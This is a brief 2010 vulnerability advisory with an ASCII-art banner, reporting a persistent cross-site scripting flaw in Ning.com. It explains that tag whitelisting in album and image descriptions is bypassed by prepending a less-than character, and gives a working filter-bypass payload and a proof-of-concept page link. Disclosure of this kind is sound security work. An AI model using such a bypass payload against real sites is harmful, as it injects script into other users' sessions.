ning-xss.txt
Posted on 28 April 2010
|=================================================================================================| | ___ ___ ___ ___ ___ ___ | | / / /\__ ___ / / / | | /:: /:: /::| | / /:: /:: /:: | | /:/: /:/: /:|:| | : /:/: /:/: /:/: | | /:/ : /:/ : /:/|:| |__ /::\__ /::~: /::~: /::~: | | /:/__/ :\__ /:/__/ :\__ /:/ |:| /\__ __/://__/ /:/: :\__ /:/: :\__ /:/: :\__ | | : /__/ : /:/ / /__|:|/:/ / //:/ / /__: /__/ :~: /__/ /_|::/:/ / | | : : /:/ / |:/:/ / ::/__/ :\__ : :\__ |:|::/ / | | : :/:/ / |::/ / :\__ /__/ : /__/ |:|/__/ | | :\__ ::/ / /:/ / /__/ :\__ |:| | | | /__/ /__/ /__/ /__/ |__| | | | |=================================================================================================| | | | Vulnerability............Persistent XSS | | Software.................Ning.com | | Date.....................4/26/10 | | Site.....................http://cross-site-scripting.blogspot.com/ | | | |=================================================================================================| | | | ##Description## | | | | Less than and greater than characters submitted in the descriptions of albums, images and | | probably others are unencoded. Any tags submitted in such fields are subjected to whitelist | | validation, but this can be bypassed by prepending a less than character to the injected open | | and close tags. | | | | | | ##Exploit## | | | | <<script>alert(0)//<</script> | | | | | | ##Proof of Concept## | | | | http://coniferous.ning.com/photo/792231134-1 | | | |=================================================================================================|
